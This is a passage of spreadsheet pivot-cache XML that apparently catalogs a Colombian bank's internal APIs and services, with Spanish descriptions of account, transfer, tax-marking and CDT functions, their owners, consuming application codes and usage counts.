    <x v="5"/>
    <s v="La API Account - Fund Transfers habilita las capacidades relacionadas con los movimientos monetarios entre cuentas como, por ejemplo: débitos, créditos, transferencias y la anulación de cada uno de estos movimientos segíºn se requiera. Para las capacidades de crédito a cuenta y transferencia entre cuentas, se valida si la cuenta tiene alguna restricción como cuenta recaudadora."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <m/>
    <s v="BC_Monitoreo_ProductorConsumidor_Depositos _x000d__x000a_ CapaTrx_ProductorConsumidor _x000d__x000a_ APPVinculation_AW1315014 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Deposits-Openshift_PRODUCTORCONSUMIDOR _x000d__x000a_ FONDOS_AW1365 _x000d__x000a_ Valores_AW1373 _x000d__x000a_ PagoSinFriccionQrInteroperable_AW1315001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ GestorCanal_NU0014001 _x000d__x000a_ Openshift_AW1333002_AccountCertificates _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Decision-Manager_NU0010001 _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ Horus_AW1258011 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ GESTION DE PRECIOS_NU0091001 _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ BancolombiaPay_AW1435001 _x000d__x000a_ TransaccionPago_AW0360006 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ RIGO_NU0135001 _x000d__x000a_ JornadaDepositos_AW1177001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Dcmonroy_prueba_paso _x000d__x000a_ AdquirenciaCargaMasiva_NU0142001 _x000d__x000a_ SEG_NU0064001"/>
    <n v="6"/>
    <m/>
    <m/>
    <n v="6"/>
    <n v="403"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-07-10T01:14:58"/>
    <s v="Accounts"/>
    <n v="130"/>
    <s v="Account - Information"/>
    <n v="112"/>
    <x v="6"/>
    <s v="Permite consultar la información general de las cuentas de un cliente y las tarjetas asociadas a las cuentas. Información como saldos, estados, plazos, montos, entre otros"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="Depositós"/>
    <s v="APP Cayman _x000d__x000a_ Cayman_Soporte _x000d__x000a_ TMP EDIN APP_AW1276001 _x000d__x000a_ TEMP MAM_AW1204 _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ TMP1 johucorr_AW0360010 _x000d__x000a_ APOLO_AW0360010 _x000d__x000a_ App inversionesGB_AW1185001"/>
    <n v="698"/>
    <n v="1"/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro FE"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-02-23T19:01:50"/>
    <s v="Accounts"/>
    <n v="1910"/>
    <s v="Account - Management"/>
    <n v="143"/>
    <x v="7"/>
    <s v="Habilita las capacidades relacionadas con la gestión administrativa de una cuenta de depósito como, por ejemplo: la apertura de una cuenta de ahorros, realizar modificaciones sobre su estado, disponibilidad de saldos y confirmar información proporcionada sobre las cuentas."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <s v="GestionDeCuentasDepositos/V1.0"/>
    <s v="Depositós"/>
    <s v="BC_Monitoreo_ProductorConsumidor_Depositos _x000d__x000a_ CapaTrx_ProductorConsumidor _x000d__x000a_ APPVinculation_AW1315014 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Deposits-Openshift_PRODUCTORCONSUMIDOR _x000d__x000a_ FONDOS_AW1365 _x000d__x000a_ Valores_AW1373 _x000d__x000a_ PagoSinFriccionQrInteroperable_AW1315001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ GestorCanal_NU0014001 _x000d__x000a_ Openshift_AW1333002_AccountCertificates _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Decision-Manager_NU0010001 _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ Horus_AW1258011 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ GESTION DE PRECIOS_NU0091001 _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ BancolombiaPay_AW1435001 _x000d__x000a_ TransaccionPago_AW0360006 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ RIGO_NU0135001 _x000d__x000a_ JornadaDepositos_AW1177001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Dcmonroy_prueba_paso _x000d__x000a_ AdquirenciaCargaMasiva_NU0142001 _x000d__x000a_ SEG_NU0064001"/>
    <n v="9172"/>
    <n v="2808"/>
    <n v="2431"/>
    <n v="485767"/>
    <n v="722877"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-22T14:55:33"/>
    <s v="Accounts"/>
    <n v="1910"/>
    <s v="Account - Offers"/>
    <n v="113"/>
    <x v="8"/>
    <s v="La API Account - Offers permite consultar la información de la oferta que ofrece el producto de depósitos como por ejemplo los planes actuales para cuentas de ahorro y corriente."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <s v="OfertaCuentasDepositos/V1.0"/>
    <m/>
    <s v="BC_Monitoreo_ProductorConsumidor_Depositos _x000d__x000a_ CapaTrx_ProductorConsumidor _x000d__x000a_ APPVinculation_AW1315014 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Deposits-Openshift_PRODUCTORCONSUMIDOR _x000d__x000a_ FONDOS_AW1365 _x000d__x000a_ Valores_AW1373 _x000d__x000a_ PagoSinFriccionQrInteroperable_AW1315001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ GestorCanal_NU0014001 _x000d__x000a_ Openshift_AW1333002_AccountCertificates _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Decision-Manager_NU0010001 _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ Horus_AW1258011 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ GESTION DE PRECIOS_NU0091001 _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ BancolombiaPay_AW1435001 _x000d__x000a_ TransaccionPago_AW0360006 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ RIGO_NU0135001 _x000d__x000a_ JornadaDepositos_AW1177001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Dcmonroy_prueba_paso _x000d__x000a_ AdquirenciaCargaMasiva_NU0142001 _x000d__x000a_ SEG_NU0064001"/>
    <n v="3106"/>
    <n v="2898"/>
    <n v="2524"/>
    <n v="2234"/>
    <n v="3563"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-02-23T19:01:50"/>
    <s v="Accounts"/>
    <n v="1910"/>
    <s v="Account - Participants"/>
    <n v="114"/>
    <x v="9"/>
    <s v="Esta Api lista los benefiarios que tiene una cuenta de un cliente."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <s v="ConsultaCuentasDepositos/V1.0"/>
    <s v="Depositós"/>
    <s v="BC_Monitoreo_ProductorConsumidor_Depositos _x000d__x000a_ CapaTrx_ProductorConsumidor _x000d__x000a_ APPVinculation_AW1315014 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Deposits-Openshift_PRODUCTORCONSUMIDOR _x000d__x000a_ FONDOS_AW1365 _x000d__x000a_ Valores_AW1373 _x000d__x000a_ PagoSinFriccionQrInteroperable_AW1315001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ GestorCanal_NU0014001 _x000d__x000a_ Openshift_AW1333002_AccountCertificates _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Decision-Manager_NU0010001 _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ Horus_AW1258011 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ GESTION DE PRECIOS_NU0091001 _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ BancolombiaPay_AW1435001 _x000d__x000a_ TransaccionPago_AW0360006 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ RIGO_NU0135001 _x000d__x000a_ JornadaDepositos_AW1177001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Dcmonroy_prueba_paso _x000d__x000a_ AdquirenciaCargaMasiva_NU0142001 _x000d__x000a_ SEG_NU0064001"/>
    <n v="2978"/>
    <n v="2779"/>
    <n v="2425"/>
    <n v="2122"/>
    <n v="3449"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-22T14:55:33"/>
    <s v="Accounts"/>
    <n v="1910"/>
    <s v="Account - Taxes"/>
    <n v="112"/>
    <x v="10"/>
    <s v="El API Account - Taxes permitirá marcar y desmarcar cuentas para que sean o no exentas del impuesto GMF (Gravamen a movimientos financieros). También permite consultar la marcación de la cuenta GMF"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <s v="ConsultaGMF/V1.0"/>
    <m/>
    <s v="BC_Monitoreo_ProductorConsumidor_Depositos _x000d__x000a_ CapaTrx_ProductorConsumidor _x000d__x000a_ APPVinculation_AW1315014 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Deposits-Openshift_PRODUCTORCONSUMIDOR _x000d__x000a_ FONDOS_AW1365 _x000d__x000a_ Valores_AW1373 _x000d__x000a_ PagoSinFriccionQrInteroperable_AW1315001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ GestorCanal_NU0014001 _x000d__x000a_ Openshift_AW1333002_AccountCertificates _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Decision-Manager_NU0010001 _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ Horus_AW1258011 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ GESTION DE PRECIOS_NU0091001 _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ BancolombiaPay_AW1435001 _x000d__x000a_ TransaccionPago_AW0360006 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ RIGO_NU0135001 _x000d__x000a_ JornadaDepositos_AW1177001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Dcmonroy_prueba_paso _x000d__x000a_ AdquirenciaCargaMasiva_NU0142001 _x000d__x000a_ SEG_NU0064001"/>
    <n v="2964347"/>
    <n v="2820676"/>
    <n v="2716439"/>
    <n v="2794985"/>
    <n v="3217680"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-22T14:55:33"/>
    <s v="Accounts"/>
    <n v="1910"/>
    <s v="Account - Transfers"/>
    <n v="122"/>
    <x v="11"/>
    <s v="Habilita las capacidades relacionadas con los movimientos monetarios entre cuentas como, por ejemplo: débitos, créditos, transferencias y la anulación de cada uno de estos movimientos segíºn se requiera."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <s v="TransferenciasCuentasDepositos/V1.0"/>
    <m/>
    <s v="BC_Monitoreo_ProductorConsumidor_Depositos _x000d__x000a_ CapaTrx_ProductorConsumidor _x000d__x000a_ APPVinculation_AW1315014 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Deposits-Openshift_PRODUCTORCONSUMIDOR _x000d__x000a_ FONDOS_AW1365 _x000d__x000a_ Valores_AW1373 _x000d__x000a_ PagoSinFriccionQrInteroperable_AW1315001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ GestorCanal_NU0014001 _x000d__x000a_ Openshift_AW1333002_AccountCertificates _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Decision-Manager_NU0010001 _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ Horus_AW1258011 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ GESTION DE PRECIOS_NU0091001 _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ BancolombiaPay_AW1435001 _x000d__x000a_ TransaccionPago_AW0360006 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ RIGO_NU0135001 _x000d__x000a_ JornadaDepositos_AW1177001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Dcmonroy_prueba_paso _x000d__x000a_ AdquirenciaCargaMasiva_NU0142001 _x000d__x000a_ SEG_NU0064001"/>
    <n v="7050"/>
    <n v="8620"/>
    <n v="5797"/>
    <n v="4737"/>
    <n v="7647"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2021-05-11T17:46:32"/>
    <s v="Accounts Foreign Branches"/>
    <n v="110"/>
    <s v="Accounts Foreign Branches - Account Balances"/>
    <n v="110"/>
    <x v="12"/>
    <s v="La API Accounts Foreign Branches - Account Balances permite conocer los saldos consolidados de todos los tipos de productos que poseea un cliente en las filiales de exterior de Bancolombia. Los tipos de producto que maneja Finacle para las filiales del exterior son los siguientes: CAA: Cuentas corrientes, SBA: Cuenta de ahorros, LAA: Préstamo retail, CLA: Préstamo corporativo y TDA: Plazos fijos"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaSaldosConsolidadosFiliales/V1.0_x000a_ConsultaSaldosProductosConsolidados/V1.0"/>
    <m/>
    <s v="TMP1 johucorr_AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro FE"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-11-24T17:02:16"/>
    <s v="Accounts Reconciliation"/>
    <n v="100"/>
    <s v="Accounts Reconciliation - Reconciliation Data Query"/>
    <n v="200"/>
    <x v="13"/>
    <s v="Api que permite  consultar a través de la identificación de un cliente, la información básica de las obligaciones, como lo es el numero de la obligacioó y el tipo de producto, ademas con las obligaciones se puede consultar los abogados que estan gestionando dichas obligaciones"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <x v="3"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <s v="GestionConciliacionClientes/V1.0"/>
    <m/>
    <s v="PORTALCOBRANZA_AW1294001"/>
    <m/>
    <n v="41"/>
    <n v="754"/>
    <n v="12804"/>
    <n v="65709"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-05-25T16:19:02"/>
    <s v="ACHFulfillment"/>
    <n v="100"/>
    <s v="ACHFulfillment - Transfers"/>
    <n v="100"/>
    <x v="14"/>
    <s v="La API ACH Fulfillment - Transfers permitirá gestionar las operaciones asociadas a otros  bancos a traves del sistema ACH, las operaciones que se podran realizar a traves de esta API son las siguientes: - Inscribir beneficiario de otro banco para realizar transferencias - Realizar envio de transferencias a otros bancos - Anular transferencia a otros bancos"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Aceptación de Pagos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <s v="TransferenciasOtrosBancos/V1.0"/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Activar Acuerdo Trade"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio ActivarAcuerdoTrade proporciona la capacidad de negocio de apertura de productos de comercio internacional. Estos productos se agrupan en tres grandes categorías. Cartas de Crédito, Garantías Bancarias y Cobranzas."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Captaciones"/>
    <m/>
    <m/>
    <s v="FINACLE - COLOMBIA_TRADE_AW0684001"/>
    <s v="AW0611001 _x000d__x000a_AW0795"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Activar CDT"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El Certificado de Depósito a Término (CDT), es un título valor en el cual el inversionista nos deposita su dinero a un plazo, a una tasa y a una forma de pago determinada, información que será recibida por el servicio de ActivarCDT_x005f_x000D_ "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Maria Isabel Gutierrez"/>
    <m/>
    <s v="FINACLE 10.2.17_CDT_AW1078001"/>
    <s v="SU2 _x000d__x000a_CDT _x000d__x000a_AW0210001 _x000d__x000a_SVP _x000d__x000a_SU5 _x000d__x000a_SVE _x000d__x000a_AW1218001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Administracion Combo Dinamico"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Administración Combo Dinámico permitirá a los consumidores consultar los combos que un cliente tiene asociados, los combos de un cliente filtrados por un producto particular, la consulta de un combo en particular y la modificación de información del combo asociada a la apertura de los productos del combo"/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="John Jairo Gaviria Escobar"/>
    <m/>
    <s v="SAP CRM_Servicio_AW0623001"/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Administracion Convenios Cartera"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Administración Convenios Cartera tiene como objetivo permitir inicialmente la consulta de los diferentes tipos de convenios de cartera que existen como convenios de libranza, de seguros, DAI, ONG´s o fundaciones, etc. Más adelante se espera que el servicio pueda ir creciendo para permitir la creación, bloqueo y cancelación de un convenio de cartera."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="AW1285001 _x000d__x000a_AW0856 _x000d__x000a_AW0360007"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Administracion ITC"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Servicio que permite el registro de transacciones en ITC (Información Transaccional de Clientes). Las transacciones reportadas a través de este servicio se verán reflejadas en los archivos consolidados de ITC un día después de la aplicación de la transacción._x005f_x000D_ "/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="ITC -  Información Transaccional de Clientes_Reportajes_ISITC0003"/>
    <s v="AW1165"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Administracion Relacion Cliente Producto"/>
    <n v="100"/>
    <x v="0"/>
    <s v="La relación cliente producto permite conocer y asociar cuales son los productos de un cliente . Este servicio permite ejecutar todas las acciones de mantenimiento de esta relación tales como: asociar un producto, actualizar una asociación, eliminar una asociación."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="John Jairo Gaviria Escobar"/>
    <m/>
    <m/>
    <s v="NU0147001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Administrar CDT"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio tiene como propósito recuperar la información de un producto a partir de un número de CDT valido o los títulos de un cliente a partir del número y tipo de identificación."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Maria Isabel Gutierrez"/>
    <m/>
    <s v="FINACLE 10.2.17_CDT_AW1078001"/>
    <s v="SU2 _x000d__x000a_AW0210001 _x000d__x000a_SVP _x000d__x000a_GDE _x000d__x000a_APP _x000d__x000a_SU5 _x000d__x000a_SVE"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Administrar Firma Documento"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Administrar Firma Documento"/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-07-19T14:54:45"/>
    <s v="Administrative Module"/>
    <n v="101"/>
    <s v="Administrative Module - File Notification"/>
    <n v="101"/>
    <x v="15"/>
    <s v="En esta API se incluirán las diferentes funcionalidades que impliquen el envió de notificaciones hacia el módulo administrativo."/>
    <s v="CANALES_Y_CONTENIDOS_DIGITALES_PYMES"/>
    <s v="Canales Pymes"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-02-22T08:13:11"/>
    <s v="Administrative Module"/>
    <n v="110"/>
    <s v="Administrative Module  Notifications"/>
    <n v="110"/>
    <x v="16"/>
    <s v="En esta API se incluirán las diferentes funcionalidades que impliquen el envió de notificaciones hacia el módulo administrativo."/>
    <s v="CANALES_Y_CONTENIDOS_DIGITALES_PYMES"/>
    <s v="Canales Pymes"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="GestionaNegocios_AW1302001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ AppInversiones_AW1185001 _x000d__x000a_ BilleteraMovil_AW1190001"/>
    <n v="2"/>
    <n v="4"/>
    <n v="2632"/>
    <n v="3818"/>
    <n v="144415"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Adquirir Producto Seguro"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Adquirir Producto Seguro"/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <s v="SOA y APIs"/>
    <x v="8"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Afectacion Monetaria AFC"/>
    <n v="100"/>
    <x v="0"/>
    <s v=" El servicio requerido en el Broker es una virtualización de servicios que se van a exponer en AFC, relacionados con la transaccionalidad de Cuentas de Ahorro para el Fomento a la Construcción:_x005f_x000D_ _x005f_x000D_ - grabarPate _x005f_x000D_ - debitarCuenta"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Maria Isabel Gutierrez"/>
    <m/>
    <s v="CUENTAS AFC_AW1110001"/>
    <s v="SAI _x000d__x000a_AFC _x000d__x000a_SUC _x000d__x000a_GOLF _x000d__x000a_AW1110001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Afectacion Monetaria Cuentas ACH"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Transacción encargada de realizar transferencias entre cuentas Depósitos a cuentas ACH (Otros Bancos)."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Captaciones"/>
    <m/>
    <m/>
    <m/>
    <s v="AW1170"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Afectacion Monetaria Depositos"/>
    <n v="100"/>
    <x v="0"/>
    <s v=" El servicio requerido en el Broker es una virtualización de servicios que se van a exponer en Bankvision, relacionados con la transaccionalidad de Cuentas de Ahorro/Corrientes:_x005f_x000D_ _x005f_x000D_ - acreditarCuenta_x005f_x000D_ - debitarCuenta_x005f_x000D_ - anularCredito_x005f_x000D_ - anularDebito_x005f_x000D_ - transferirFondosEntreCuentas_x005f_x000D_ - anularTransferenciaFondosEntreCuentas_x005f_x000D_ "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="CUENTAS AFC_AW1110001"/>
